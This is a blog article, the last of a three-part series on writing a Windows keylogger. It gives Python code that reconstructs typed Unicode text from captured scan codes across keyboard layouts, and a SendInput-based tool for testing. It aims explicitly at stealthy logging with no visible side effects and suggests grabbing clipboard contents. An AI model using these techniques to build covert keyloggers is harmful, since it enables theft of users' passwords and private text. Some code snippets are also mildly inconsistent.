Writing a decent win32 keylogger [3/3]
- 21/12/2023 - dansIn this series of articles, we talk about the ins and out of how to build a keylogger for Windows that is able to support all keyboard layouts and reconstruct Unicode characters correctly regardless of the language (excluding those using input method editors).
In the first part, after a brief introduction introducing the concepts of scan codes, virtual keys, characters and glyphs, we describe three different ways to capture keystrokes (GetKeyState, SetWindowsHookEx, GetRawInputData) and the differences between those techniques.
In the second part, we detail how Windows stores keyboard layouts information in the kbd*.dll and how to parse them.
In the third and last part, we go through the process of using the extracted information to convert scan codes into characters and all the tricky cases presented by different layouts, such as ligatures, dead keys, extra shift-states and SGCAPS.
Finally, we present our methodology to test and validate that our reconstruction is correct by writing a testing tool which can automate the injection of scan codes and retrieve the reference text produced by Windows which we compare with our reconstructed text.
In this last installment of our Writing a decent Win32 keylogger we use the techniques described in the first and second articles and complete our scan-code to character reconstruction process.
Reconstruction process
High level view
So now we have a pretty clear picture of what goes on in these DLLs, let’s write a reconstruction algorithm. We will use the Python programming language and assume that we already have a variable called layout
that is the result of json.loads()
of the correct JSON file’s content for the current keyboard layout.
Let’s start with a high level view of the process:
For each input event:
- Convert the scan code (and extended flags) to a virtual character using
pusVSCtoVK
,pVSCtoVK_E0
andpVSCtoVK_E1
lookup tables. - Update the current shift state based on the latest key press or key release.
- handle left and right handed versions of shift state modifiers.
- handle LOCK keys (capslock, numlock, etc.)
- Look up the output character(s) from
pVkToWcharTable
based on our input virtual key and current shift state.- handle regular characters
- handle dead characters
- handle ligatures
- update internal states
- output 0 or more characters
The initial implementation could look like this:
events = jsonl_load('events.jsonl') # read all input key events from file
layout = load_layout('kbdfr.json') # load the active keyboard layout
# prepare a state object that keeps track of which keys are currently pressed and a buffer for dead chars
state = {
'vk': [ 0 for i in range(0x100) ],
'dead': None,
'capslock': 0,
'numlock': 1, # assume we start with numlock ON (default for windows)
'scrolllock': 0,
}
# process all events
for evt in events:
vk = sc_to_vk(evt['sc'], evt['e0'], evt['e1'], layout)
shiftstate = update_shiftstate(vk, state, layout)
col = shiftstate_to_column(shiftstate, layout)
if evt['keyup']:
# output characters only when the key is pressed, not when it is released
continue
ch, dead = vk_to_chars(vk, col, layout)
out += output_char(ch, dead, vk, state, layout)
# print output
print(out)
Now let’s see in more details how we can implement those steps, starting with the scan code to virtual key conversion.
Scan code to virtual key conversion
def sc_to_vk(sc, e0, e1, state, layout) -> (int, str):
# check in vsc_to_vk map first
for it in layout['vsc_to_vk']:
if it['sc'] == sc:
# skip this entry if it has the "extended flags" and neither E0 nor E1 are set
if 'KBDEXT' in it['flags'] and not e0 and not e1:
continue
# E0 or E1 but no KBDEXT flag, skip that one too
elif 'KBDEXT' not in it['flags'] and (e0 or e1):
continue
# found a matching entry, return the virtual key and its name
return it['vk'], it['vkn']
# check extended scan codes
if e0:
for it in layout['vsc_to_vk_e0']:
if it['sc'] == sc:
return it['vk'], it['vkn']
if e1:
for it in layout['vsc_to_vk_e1']:
if it['sc'] == sc:
return it['vk'], it['vkn']
# no match, unsupported scan code for this layout
return None, None
It is important to go through the non-extended lookup table even when E0
and E1
are set as some entries have the KBDEXT
flag. Our initial (naive) implementation just went through one of the tables based on the E0
and E1
flag values, but it missed keys (such as right shift).
Shift states
Now based on the virtual key that is pressed or released, we can update our current shift state, which means figuring out what is the current combination of “control”, “shift”, “alt” (and some other) keys. Here is what we can do:
- Keep track of the status of NUMLOCK, CAPSLOCK and SCROLLLOCK keys.
- Adjust the values of right/left handed modifiers to the generic versions (
VK_RCONTROL
=>VK_CONTROL
,VK_LCONTROL
=>VK_CONTROL
, same for SHIFT and MENU) - If the current keyboard layout has the ALT-GR flag, then handle
VK_RMENU
as bothVK_MENU
andVK_CONTROL
. - Update our internal state to keep track of which virtual keys are currently pressed.
- go through all modifier virtual keys for this layout and calculate the current shift state.
- convert the shift state value to a column index in the
vk_to_wchars
tables.
Here is an extract of the relevant code for the last 2 steps:
shiftstate = 0
for mod in layout['modifiers']:
if state['vk'][mod['vk']]:
shiftstate |= mod['modbits']
column = layout['shiftstates'][shiftstate]
if col == 15:
# invalid shiftstate
...
Virtual key to characters
Now we have everything we need to perform a lookup in the PVK_TO_WCHAR_TABLE
. Here’s our annotated code to handle it:
def vk_to_chars(vk, col, layout) -> tuple(int, int):
'''
The first item of the returned tuple is the output wchar_t value as an int.
The second value is always none, except if the 1st value is WCH_DEAD,
in which case the 2nd value is the dead character.
'''
# go through all the sub tables
for vkmap in layout['vk_to_wchars']:
# skip tables not containing enough columns (one or more shift states)
if col >= vkmap['num_mods']:
continue
# go through all entries
for i in range(len(vkmap['table'])):
it = vkmap['table'][i]
# does this entry match the current virtual key?
if it['vk'] == vk:
# here we handle a couple tricky cases
# regular CAPSLOCK, code assumes VK_SHIFT is modifier with bit 1
# (which is the case for all keymaps shipped in windows)
if it['attrs'] == CAPLOK and not col and state['capslock']:
# capslock is engaged, the key has the CAPLOCK flag
# adjust the column as if VK_SHIFT was pressed
col = 1
# skip SGCAPS entry if we have CAPSLOCK on and SHIFT
if it['attrs'] == SGCAPS and state['capslock']:
continue
# handle dead characters
if it['wch'][col] == WCH_DEAD:
# also return the associated dead key
return it['wch'][col], vkmap['table'][i+1]['wch'][col]
# regular case, we can just return the char value
return it['wch'][col], None
# nothing found
return None, None
There is something we need to explain here about the handling of the WCH_DEAD
case. When we get the magic value WCH_DEAD
, we need to look at the next entry in the table to find out the value of the dead character. The capslock and SGCAPS
lines will be detailed later on in the "Tricky cases" section of this article.
Output
The previous function can return the following values:
WCH_NONE
: there is nothing to outputWCH_DEAD
: there is nothing to output, the dead character must be stored for the next input eventWCH_LGTR
: there is more than one character to output- unicode code point: there is exactly one character to output (in addition to the eventual buffered dead-char)
However, we also need to take in consideration potential buffered dead characters. Our algorithm to handle new characters to output is the following:
output = []
if current_char is WCH_NONE
abort
if buffered_dead_char
combined_char = is_valid_deadchar_combination(buffered_dead_char, current_char, layout)
// support for chained dead chars
if combined_char and current_char is dead_char
set buffered_dead_char = combined
abort
if combined
output += [ combined_char ]
else
// bad deadchar combination
output += [ buffered_dead_char, current_char ]
set buffered_dead_char = none
else if current_char is dead_char
set buffered_dead_char = current_char
else if current_char is ligature
output += vk_to_ligature(current_char_vk) // this function returns an array of characters
else
// regular character
output += [ current_char ]
for each character in output
print character
… And we finally print out the reconstructed text stream!
Tricky cases
Now we will focus on a few tricky edge cases we encountered during this research.
Numpad keys
In the vsc_to_vk
tables, all numpad keys have both KBDSPECIAL
and KBDNUMPAD
flags - which means Windows does some special processing - but unfortunately, they always only point to the non-numlock virtual keys. So for the numpad key 0, the only entry we have points to VK_INSERT
and never VK_NUMPAD0
. This is a bit annoying as it forces us to add a special handling case and “fix” the virtual key value after our conversion from scan code. Here is the implementation:
def fix_numpad_vk(vk, state):
'''
numpad keys are handled differently, the mapping towards VK_NUMPAD*
is not present in the keyboard layout dlls, juste the one to VK_INSERT, ...
so fix it manually :/
'''
if not state['numlock']:
return vk
fix_map = {
VK_INSERT: VK_NUMPAD0,
VK_END: VK_NUMPAD1,
VK_DOWN: VK_NUMPAD2,
VK_NEXT: VK_NUMPAD3,
VK_LEFT: VK_NUMPAD4,
VK_CLEAR: VK_NUMPAD5,
VK_RIGHT: VK_NUMPAD6,
VK_HOME: VK_NUMPAD7,
VK_UP: VK_NUMPAD8,
VK_PRIOR: VK_NUMPAD9,
}
if vk in fix_map:
return fix_map[vk]
return vk
Extra shift states
Most keyboard layouts use the standard SHIFT, CONTROL and ALT modifiers and quite a few use ALT-GR, which is handled as CONTROL + ALT. So only 3 modifier keys are used in most cases, but not all of them!
A good example is KBDCAN.DLL
which handles “Canadian Multilingual Standard” which supports typing English, French and a few other languages. On that layout, the right control key maps to VK_OEM_8
instead of the usual VK_RCONTROL
and can also be combined with VK_SHIFT
to procuce additionnal characters.
The algorithm and code described previously for the shift state calculation does handle those extra modifier keys.
Chained dead keys
We talked about dead keys quite a bit already, but there is a case we havent covered yet that can happen in at least two keyboard layouts: chained dead chars. Both “Cherokee Phonetic” and “French (Standard, BÉPO)” have the ability to chain dead keys. Here is an example for Cherokee:
Key strokes | output character | comments |
---|---|---|
q + o | Ꮙ | regular dead key with 2 key presses |
d + s + SPACE | Ꮳ | chained dead keys |
d + s + i | Ꮵ | chained dead keys |
The support of this feature complicates the processing of dead chars and of output a little bit. Notably, you have to update your dead char buffer accordingly, keeping in mind that there will always be only one dead character in the buffer, but that it will change upon the second keypress.
ligatures
As we saw earlier, a single keypress can generate up to five distinct unicode characters. While there is no inherent difficulty in processing them, as our simple code can attest.
def vk_to_ligature(vk, modnum, layout):
for lig in layout['ligatures']:
if lig['vk'] == vk and modnum == lig['modnum']:
return lig['chars']
return None
...
print(''.join(vk_to_ligature(...)))
sgcaps
SGCaps stands for “Swiss German Capitals”, in this layout (and some other, mostly eastern european languages) holding SHIFT
and having CAPSLOCK
on are not equivalent. For example, let’s take the key VK_OEM_1
which has a whopping five labeled characters:
ü
, when neither shift nor capslock are engagedÜ
, when CAPSLOCK is on (but shift is not)è
, when SHIFT is on (but CAPSLOCK is not)È
, when both SHIFT and CAPSLOCK are on[
, when only ALT-GR is on
Let’s see an annotated extract of the table vk_to_wchars
in kbdsg.json
that refers that specific virtual key.
{ "attrs": 2, "vk": 186, "vkn": "VK_OEM_1", "wch": [ 252 /* ü */, 232 /* è */, 91/* [ */, 27/* ESC */ ] },
{ "attrs": 0, "vk": 186, "vkn": "VK_OEM_1", "wch": [ 220 /* Ü */, 200 /* È */, 91/* [ */, 27/* ESC */ ] },
As you can see, we have two entries for the same virtual key, and the first entry has the SGCAPS
flag (0x2). When processing entries such entries, you must rememeber to skip them if CAPSLOCK
is engaged and go to the next one (without the SGCAPS flag).
Building a test program
In order to speed up testing and debugging, we wrote a simple win32 Python program which can be fed our keylogger’s output, which will then emulate the key-presses and retrieve the characters sent to the program by Windows. This gives us a frame of reference to validate our reconstruction.
Sending input events
To emulate input events, Windows offers the function SendInput
which is defined as:
UINT SendInput(UINT cInputs, LPINPUT pInputs, int cbSize);
This function can be used to send multiple INPUT
structures which are basically a union of MOUSEINPUT
, KEYBDINPUT
and HARDWAREINPUT
. We will only send events of type KEYBDINPUT
in our test program. Here is the structure’s definition:
typedef struct tagKEYBDINPUT {
WORD wVk;
WORD wScan;
DWORD dwFlags;
DWORD time;
ULONG_PTR dwExtraInfo;
} KEYBDINPUT, *PKEYBDINPUT, *LPKEYBDINPUT;
To simulate key-presses, we only need to fill the wScan
(scan code) and dwFlags
members. It is important to set the KEYEVENTF_SCANCODE
flag or else wVk
(virtual key) member will be used instead of wScan
. Additionally we conditionally set the flags KEYEVENTF_EXTENDEDKEY
for E0
/ E1
scan codes and the flag KEYEVENTF_KEYUP
to indicate a key release.
Here is the python code that uses ctypes
to call SendInput
to inject key presses:
from ctypes import *
from ctypes import wintypes as w
# required flags / defines
KEYEVENTF_EXTENDEDKEY = 0x1
KEYEVENTF_KEYUP = 0x2
KEYEVENTF_UNICODE = 0x4
KEYEVENTF_SCANCODE = 0x8
INPUT_KEYBOARD = 1
# not defined by wintypes
ULONG_PTR = c_ulong if sizeof(c_void_p) == 4 else c_ulonglong
class KEYBDINPUT(Structure):
_fields_ = [('wVk' ,w.WORD),
('wScan',w.WORD),
('dwFlags',w.DWORD),
('time',w.DWORD),
('dwExtraInfo',ULONG_PTR)]
class MOUSEINPUT(Structure):
_fields_ = [('dx' ,w.LONG),
('dy',w.LONG),
('mouseData',w.DWORD),
('dwFlags',w.DWORD),
('time',w.DWORD),
('dwExtraInfo',ULONG_PTR)]
class HARDWAREINPUT(Structure):
_fields_ = [('uMsg' ,w.DWORD),
('wParamL',w.WORD),
('wParamH',w.WORD)]
class DUMMYUNIONNAME(Union):
_fields_ = [('mi',MOUSEINPUT),
('ki',KEYBDINPUT),
('hi',HARDWAREINPUT)]
class INPUT(Structure):
_anonymous_ = ['u']
_fields_ = [('type',w.DWORD),
('u',DUMMYUNIONNAME)]
user32 = WinDLL('user32')
user32.SendInput.argtypes = w.UINT, POINTER(INPUT), c_int
user32.SendInput.restype = w.UINT
def send_scancode(code, up, ext):
''' uses SendInput to send a specified scancode, setting the appropriate flags for key up/down and e0/e1 extended flags '''
i = INPUT()
i.type = INPUT_KEYBOARD
i.ki = KEYBDINPUT(0, code, KEYEVENTF_SCANCODE, 0, 0)
if up:
i.ki.dwFlags |= KEYEVENTF_KEYUP
if ext:
i.ki.dwFlags |= KEYEVENTF_EXTENDEDKEY
return user32.SendInput(1, byref(i), sizeof(INPUT)) == 1
We can now use the function send_scancode
specifying the scan code, if the key is pressed or released, and wether it’s an extended scan code or not.
Switching the keyboard layout
To speed up testing, we wanted to be able to change input languages on the fly with no manual GUI action. We first experimented with ActivateKeyboardLayout
and other functions but it did not work in the end due to the fact that keyboard layouts are bound to threads, and to be more accurate, to the thread responsible for the creation of a window (HWND
). In the case of a console program, it is actually created by conhost.exe
and not the running program, which makes it harder to identify the right thread (and process!).
So the method we ended up using is to simply send the window message WM_INPUTLANGCHANGEREQUEST
to the foreground window, which will work as long as our program has the focus. It looks like this:
# defines
WM_INPUTLANGCHANGEREQUEST = 0x0050
# prototypes
user32.GetForegroundWindow.restype = POINTER(w.HWND)
user32.SendMessageA.argtypes = POINTER(w.HWND),w.UINT,w.WPARAM,w.LPARAM
user32.SendMessageA.restype = c_int
def switch_layout(klid):
'''
uses SendMessageA to the current foreground window instead of
ActivateKeyboardLayout / LoadkeyboardLayout which will not work
if not called from the main thread of the current program,
which is not the case with python ...
'''
return user32.SendMessageA( user32.GetForegroundWindow(), WM_INPUTLANGCHANGEREQUEST, 0, int(klid, 16)) == 0
Note: Since, there is a setting in Windows allowing all windows to use different input languages, you can’t rely on the keylogger’s active layout to be correct. So you need to figure out the intended recipient program’s active layout’s name and id. We initially found the active keyboard layout (HKL) for our target and then used ActivateKeyboardLayout
and GetKeyboardLayoutNameA
to get the KLID
before restoring the original active keyboard layout in our own context. Which we discovered was a very bad idea: indeed, there was a very noticeable side effect affecting the target program preventing some keys from working (alt-gr combos for example). This is why we fell back to enumerating the registry’s keyboard layouts to get the HKL / KLID / dll name correlations.
Putting it all together
Now we have:
- Three different key logger programs,
- A keymap data extractor to transform keyboard layout DLLs into more useable JSON files,
- A replayer program to get the correct output from a list of input scan codes and a keyboard layout,
- And a reconstruction program that can use the output of all of the others to make sure everything is processed correctly!
All the code is available on github here.
Hopefully this article will help you understand a bit better how keyboard input works on Windows and how to write a good keylogger: one that supports multiple languages, that doesn’t hardcode a list of strings mapped to virtual keys, that handles dead keys, ligatures, multiple shift states and moreover, that doesn’t introduce visible side effects!
We haven't covered languages that use IME
(input method editors), which simply put, add another layer between the input and the windows. Between their diversity, the fact that they can use both keyboard and mouse and can be customized, it doesn't seem very practical to emulate them. I would recommend attacking the problem from a different approach: hooking the window messages and look for WM_CHAR
events. This way you get the correct characters directly with no added effort.
Finally, there are a few things we haven’t touched on yet that we yet could improve. All keys that move the cursor arround, suchs as arrow keys, page up, page down can affect the output. Let’s take for instance the following input A
, LEFT
, B
. The output result would be BA
and not AB
. There is also the detection of CTRL-V
which you may want to handle with a call to GetClipboardData()
. We’ll leave that as an exercise for the reader ;)